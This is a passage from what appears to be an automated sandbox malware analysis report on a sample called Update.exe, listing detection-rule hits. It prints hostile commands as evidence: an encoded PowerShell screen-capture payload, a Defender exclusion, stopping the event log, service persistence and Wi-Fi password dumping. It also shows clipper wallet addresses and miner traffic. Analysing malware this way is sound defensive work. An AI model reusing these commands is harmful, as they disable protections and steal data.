AAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA
                    Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Update.exe", ParentImage: C:\Users\user\Desktop\Update.exe, ParentProcessId: 1184, ParentProcessName: Update.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7976, ProcessName: cmd.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Update.exe", ParentImage: C:\Users\user\Desktop\Update.exe, ParentProcessId: 1184, ParentProcessName: Update.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe'", ProcessId: 3192, ProcessName: cmd.exe
                    Sigma detected: Remote Thread Creation By Uncommon Source Image
                    Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\explorer.exe, SourceProcessId: 7640, StartAddress: 40346418, TargetImage: C:\Windows\System32\tasklist.exe, TargetProcessId: 7640
                    Sigma detected: SCR File Write Event
                    Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\Update.exe, ProcessId: 1184, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr
                    Sigma detected: Startup Folder File Write
                    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\Update.exe, ProcessId: 1184, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
                    Sigma detected: Suspicious Execution of Powershell with Base64
                    Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                    Sigma detected: Suspicious Screensaver Binary File Creation
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\Update.exe, ProcessId: 1184, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr
                    Sigma detected: Dynamic CSharp Compile Artefact
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8368, TargetFilename: C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.cmdline
                    Sigma detected: New Service Creation Using Sc.EXE
                    Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "JLDYOGXF" binpath= "C:\ProgramData\bmqxekewprir\nfblozsybbjy.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "JLDYOGXF" binpath= "C:\ProgramData\bmqxekewprir\nfblozsybbjy.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Build.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Build.exe, ParentProcessId: 7424, ParentProcessName: Build.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "JLDYOGXF" binpath= "C:\ProgramData\bmqxekewprir\nfblozsybbjy.exe" start= "auto", ProcessId: 8500, ProcessName: sc.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3192, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe', ProcessId: 908, ProcessName: powershell.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Dot net compiler compiles file from suspicious location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Sigma detected: Stop EventLog
                    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Build.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Build.exe, ParentProcessId: 7424, ParentProcessName: Build.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 8476, ProcessName: sc.exe

                    Stealing of Sensitive Information

                    barindex
                    Sigma detected: Capture Wi-Fi password
                    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Update.exe", ParentImage: C:\Users\user\Desktop\Update.exe, ParentProcessId: 1184, ParentProcessName: Update.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 8072, ProcessName: cmd.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-09T06:31:19.072972+020020362892Crypto Currency Mining Activity Detected192.168.2.4529041.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-09T06:30:59.233515+020028269302Crypto Currency Mining Activity Detected192.168.2.44974345.76.89.7080TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-09T06:31:27.743317+020028577511A Network Trojan was detected192.168.2.449745149.154.167.220443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 23.0.lf6o4T3T.exe.970000.0.unpackMalware Configuration Extractor: Redline Clipper {"Wallet Addresses": ["14erhPhc9GWKjwxi1gULqjNxc7hMHUJhmb", "0x10216699882a3395893bbeb03745f444799be108", "DGTuLZSsUTFwHmFZJfwUXqUJXaihFjsRDa", "LiMPN75CmUKHNSGof6UEttikARmdEotvwW", "Xq8qJcE7zdgpWmizeh4kygqbK1t2AtmD9m", "4275Xju8vVcJP1RVqQbK2Z7GkZLGujw9JAXrN4DAkKTgeodnR4BTKauhEmWUJp3hsrKLEtey7vFHGFPp7yjeE8Q6QZVfkbP"]}
                    Multi AV Scanner detection for domain / URL
                    Source: pool.hashvault.proVirustotal: Detection: 6%Perma Link
                    Source: http://pesterbdd.com/images/Pester.pngVirustotal: Detection: 9%Perma Link
                    Multi AV Scanner detection for dropped file
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeReversingLabs: Detection: 91%
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeReversingLabs: Detection: 91%
                    Multi AV Scanner detection for submitted file
                    Source: Update.exeReversingLabs: Detection: 50%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                    Bitcoin Miner

                    barindex
                    Yara detected Xmrig cryptocurrency miner
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Detected Stratum mining protocol
                    Source: global trafficTCP traffic: 192.168.2.4:49743 -> 45.76.89.70:80 payload: data raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 32 37 35 58 6a 75 38 76 56 63 4a 50 31 52 56 71 51 62 4b 32 5a 37 47 6b 5a 4c 47 75 6a 77 39 4a 41 58 72 4e 34 44 41 6b 4b 54 67 65 6f 64 6e 52 34 42 54 4b 61 75 68 45 6d 57 55 4a 70 33 68 73 72 4b 4c 45 74 65 79 37 76 46 48 47 46 50 70 37 79 6a 65 45 38 51 36 51 5a 56 66 6b 62 50 22 2c 22 70 61 73 73 22 3a 22 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 31 39 2e 33 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 38 2e 30 20 6d 73 76 63 2f 32 30 32 32 22 2c 22 72 69 67 69 64 22 3a 22 22 2c 22 61 6c 67 6f 22 3a 5b 22 72 78 2f 30 22 2c 22 63 6e 2f 32 22 2c 22 63 6e 2f 72 22 2c 22 63 6e 2f 66 61 73 74 22 2c 22 63 6e 2f 68 61 6c 66 22 2c 22 63 6e 2f 78 61 6f 22 2c 22 63 6e 2f 72 74 6f 22 2c 22 63 6e 2f 72 77 7a 22 2c 22 63 6e 2f 7a 6c 73 22 2c 22 63 6e 2f 64 6f 75 62 6c 65 22 2c 22 63 6e 2f 63 63 78 22 2c 22 63 6e 2d 6c 69 74 65 2f 31 22 2c 22 63 6e 2d 68 65 61 76 79 2f 30 22 2c 22 63 6e 2d 68 65 61 76 79 2f 74 75 62 65 22 2c 22 63 6e 2d 68 65 61 76 79 2f 78 68 76 22 2c 22 63 6e 2d 70 69 63 6f 22 2c 22 63 6e 2d 70 69 63 6f 2f 74 6c 6f 22 2c 22 63 6e 2f 75 70 78 32 22 2c 22 63 6e 2f 67 70 75 22 2c 22 63 6e 2f 31 22 2c 22 72 78 2f 77 6f 77 22 2c 22 72 78 2f 61 72 71 22 2c 22 72 78 2f 67 72 61 66 74 22 2c 22 72 78 2f 73 66 78 22 2c 22 72 78 2f 6b 65 76 61 22 2c 22 70 61 6e 74 68 65 72 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 76 32 22 2c 22 61 72 67 6f 6e 32 2f 6e 69 6e 6a 61 22 2c 22 67 68 6f 73 74 72 69 64 65 72 22 5d 7d 7d 0a data ascii: 